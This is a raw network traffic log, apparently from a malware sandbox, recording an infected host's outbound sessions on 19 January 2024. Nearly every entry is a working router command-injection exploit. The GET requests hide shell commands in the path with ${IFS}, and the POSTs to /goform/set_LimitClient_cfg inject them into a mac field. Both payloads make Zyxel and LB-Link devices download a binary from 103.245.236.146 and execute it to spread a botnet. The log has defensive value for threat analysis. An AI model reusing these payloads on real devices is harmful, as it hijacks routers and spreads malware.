                                                  Jan 19, 2024 18:23:52.995687008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3833192.168.2.135605242.126.205.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995754957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3834192.168.2.134534025.138.205.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995790005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3835192.168.2.134080876.166.12.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995852947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3836192.168.2.134616488.31.247.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995920897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3837192.168.2.1335092110.92.82.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995979071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3838192.168.2.135362697.107.68.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996017933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3839192.168.2.136043470.23.107.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996076107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3840192.168.2.134861825.252.225.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996114969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3841192.168.2.133377270.121.145.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996190071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3842192.168.2.1347884221.184.117.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996241093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3843192.168.2.1340362130.71.139.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996274948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3844192.168.2.13450825.182.110.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996319056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3845192.168.2.134634050.78.48.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996349096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3846192.168.2.134044020.85.76.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996419907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3847192.168.2.1332946221.108.175.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996473074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3848192.168.2.1353688126.97.186.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996540070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3849192.168.2.133406470.20.229.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996599913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3850192.168.2.1335576190.0.47.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996659994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3851192.168.2.1348244196.42.8.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996706963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3852192.168.2.136068295.145.56.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996762991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3853192.168.2.1355570133.2.200.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.996836901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3854192.168.2.1348638185.129.104.168080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:53.185431957 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:53.400594950 CET448INHTTP/1.0 403 Access denied because Web Monitor access is not permitted from this source(no certificate presented). Please consult http-access directive in PMTA User Guide.
                                                  Content-Type: text/html
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-Content-Type-Options: nosniff
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 62 65 63 61 75 73 65 20 57 65 62 20 4d 6f 6e 69 74 6f 72 20 61 63 63 65 73 73 20 69 73 20 6e 6f 74 20 70 65 72 6d 69 74 74 65 64 20 66 72 6f 6d 20 74 68 69 73 20 73 6f 75 72 63 65 28 6e 6f 20 63 65 72 74 69 66 69 63 61 74 65 20 70 72 65 73 65 6e 74 65 64 29 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 75 6c 74 20 68 74 74 70 2d 61 63 63 65 73 73 20 64 69 72 65 63 74 69 76 65 20 69 6e 20 50 4d 54 41 20 55 73 65 72 20 47 75 69 64 65 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><body>Access denied because Web Monitor access is not permitted from this source(no certificate presented). Please consult http-access directive in PMTA User Guide.</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3855192.168.2.133633679.148.243.1708080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:53.233450890 CET509INHTTP/1.0 400 Bad Request
                                                  Server: thttpd/2.19-MX Sep 9 2013
                                                  Content-type: text/html
                                                  Date: Fri, 19 Jan 2024 17:23:53 GMT
                                                  Last-modified: Fri, 19 Jan 2024 17:23:53 GMT
                                                  Accept-Ranges: bytes
                                                  Connection: close
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 31 39 2d 4d 58 20 53 65 70 20 20 39 20 32 30 31 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                  Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.19-MX Sep 9 2013</A></ADDRESS></BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3856192.168.2.1343258114.34.138.628080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:53.255014896 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:53.543976068 CET289INHTTP/1.1 404 Not Found
                                                  CONNECTION: close
                                                  CONTENT-LENGTH: 48
                                                  X-XSS-Protection: 1;mode=block
                                                  Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                  X-Content-Type-Options: nosniff
                                                  CONTENT-TYPE: text/html
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3857192.168.2.1334200175.230.115.458080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:53.265450954 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:53.559786081 CET103INHTTP/1.1 404 Not Found
                                                  Content-Type: text/plain
                                                  Content-Length: 30
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3858192.168.2.13556649.180.145.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010086060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3859192.168.2.135982641.17.36.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010142088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3860192.168.2.1333988109.174.245.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010205030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3861192.168.2.134681257.161.188.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010247946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3862192.168.2.1347658143.130.93.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010308981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3863192.168.2.1348898202.209.186.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010371923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3864192.168.2.1343986196.96.132.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010456085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3865192.168.2.1354584170.88.190.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010498047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3866192.168.2.134059881.57.6.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010557890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3867192.168.2.1360432149.184.206.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010623932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3868192.168.2.1347448156.127.115.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010684013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3869192.168.2.134752623.113.233.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010739088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3870192.168.2.1349950196.6.38.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010790110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3871192.168.2.1346600192.88.38.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010837078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3872192.168.2.1359082175.36.12.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010894060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3873192.168.2.1336190175.206.207.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.010957956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3874192.168.2.1349354135.210.36.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011023045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3875192.168.2.1344332121.45.71.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011080980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3876192.168.2.1351152142.127.154.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011137009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3877192.168.2.133625646.69.212.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011183023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3878192.168.2.1354812132.157.166.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011241913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3879192.168.2.1358626191.20.176.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011298895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3880192.168.2.1359438154.210.215.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011353016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3881192.168.2.134579472.249.122.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.011414051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3882192.168.2.1343418219.55.101.85443
                                                  TimestampBytes transferredDirectionData
